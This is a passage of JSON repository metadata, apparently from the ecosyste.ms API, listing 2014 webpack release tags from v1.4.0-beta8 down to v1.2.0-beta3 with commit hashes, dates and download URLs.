-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp